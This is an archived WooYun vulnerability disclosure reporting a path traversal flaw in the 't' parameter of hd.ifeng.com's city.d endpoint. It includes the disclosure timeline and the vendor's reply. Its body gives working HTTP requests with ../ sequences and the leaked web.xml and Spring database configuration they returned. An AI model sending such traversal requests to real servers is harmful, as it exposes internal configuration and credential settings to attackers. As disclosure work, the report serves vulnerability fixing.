乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-21: 细节已通知厂商并且等待厂商处理中 2015-03-23: 厂商已经确认,细节仅向厂商公开 2015-04-02: 细节向核心白帽子及相关领域专家公开 2015-04-12: 细节向普通白帽子公开 2015-04-22: 细节向实习白帽子公开 2015-05-07: 细节向公众公开
网站:hd.ifeng.com模版参数没有校验请求
GET /city/city.d?u_id=23157ea9-ce30-4ec9-93dd-8b130ca67be65a6347&m=chg&city=%E4%B8%8A%E6%B5%B7&t=..%2f..%2f..%2f..%2fWEB-INF%2fweb.xml HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: hd.ifeng.comAccept-Encoding: gzip, deflate
返回
HTTP/1.1 200 OKDate: Sat, xx Mar 2015 xxxx GMTServer: Apache/2.0.54 (Unix) Resin/3.0.26 PHP/5.2.3Vary: Accept-EncodingContent-Language: en-USETag: "BpV48e5vVyd"Last-Modified: Sun, 21 Sep 2014 10:22:47 GMTContent-Length: 7442Set-Cookie: city=021; domain=.aibang.com; path=/; expires=Sat, Content-Type: text/xmlConnection: close<?xml version="1.0" encoding="UTF-8"?><web-app version="2.4" xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"> <context-param> <param-name>contextConfigLocation</param-name> <param-value> /WEB-INF/SPRING-CONF/applicationContext.xml /WEB-INF/SPRING-CONF/applicationContext-db.xml /WEB-INF/SPRING-CONF/applicationContext-ibatis.xml </param-value> </context-param> <filter> <filter-name>encoding</filter-name> <filter-class>com.aibang.wap.filter.WapFilter</filter-class> </filter> <filter> <filter-name>authFilter</filter-name> <filter-class>com.aibang.wap.filter.AuthFilter</filter-class> </filter> <filter> <filter-name>tuanAuthFilter</filter-name> <filter-class>com.aibang.wap.filter.TuanAuthFilter</filter-class> </filter> <filter-mapping> <filter-name>encoding</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <filter-mapping> <filter-name>authFilter</filter-name> <url-pattern>/user/*</url-pattern> </filter-mapping> <filter-mapping> <filter-name>tuanAuthFilter</filter-name> <url-pattern>/tuan/*</url-pattern> </filter-mapping> <filter-mapping> <filter-name>authFilter</filter-name> <url-pattern>/sms/*</url-pattern> </filter-mapping>。。。。。。。。。。。。。。。。。。。。。。。
请求
GET /city/city.d?u_id=23157ea9-ce30-4ec9-93dd-8b130ca67be65a6347&m=chg&city=%E4%B8%8A%E6%B5%B7&t=..%2f..%2f..%2f..%2fWEB-INF%2fSPRING-CONF%2fapplicationContext-db.xml HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-USCache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: hd.ifeng.comAccept-Encoding: gzip, deflate
HTTP/1.1 200 OKDate: Sat, xxxServer: Apache/2.0.54 (Unix) Resin/3.0.26 PHP/5.2.3Vary: Accept-EncodingContent-Language: en-USETag: "BpWEaVUhZ5h"Last-Modified: Sun, 21 Sep 2014 10:22:49 GMTContent-Length: 11078Set-Cookie: city=021; domain=.aibang.com; path=/; expires=Sun, Connection: close<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE beans PUBLIC "-//SPRING//DTD BEAN//EN" "http://www.springframework.org/dtd/spring-beans.dtd"><beans> <bean id="propertyConfigurer" class="org.wolf.web.context.WfPropertyPlaceholderConfigurer"/> <bean id="ituands" class="org.logicalcobwebs.proxool.ProxoolDataSource" lazy-init="false"> <property name="driver"> <value>com.mysql.jdbc.Driver</value> </property> <property name="driverUrl"> <value>${ituan.db}</value> </property> <property name="user"> <value>${ituan.user}</value> </property> <property name="password"> <value>${ituan.pwd}</value> </property> <property name="alias"> <value>ituands</value> </property> <property name="houseKeepingSleepTime"> <value>300000</value> </property> <property name="prototypeCount"> <value>5</value> </property> <property name="maximumConnectionCount"> <value>200</value> </property> <property name="minimumConnectionCount"> <value>2</value> </property> <property name="trace"> <value>true</value> </property> <property name="verbose"> <value>true</value> </property> </bean> <bean id="wapds" class="org.logicalcobwebs.proxool.ProxoolDataSource" lazy-init="false"> <property name="driver"> <value>com.mysql.jdbc.Driver</value> </property> <property name="driverUrl"> <value>${wap.db}</value> </property> <property name="user"> <value>${wap.user}</value> </property> <property name="password"> <value>${wap.pwd}</value> </property> <property name="alias"> <value>wapds</value> </property> <property name="houseKeepingSleepTime"> <value>300000</value> </property> <property name="prototypeCount"> <value>5</value> </property> <property name="maximumConnectionCount"> <value>300</value> </property>。。。。。。。。。。。。。。。。。。。。。。。。。。
危害等级:低
漏洞Rank:1
确认时间:2015-03-23 09:53
谢谢,这个业务不是我们的,访问一下网站的域名您就知道这是爱帮的业务,我们尽快联系他们进行修复。
暂无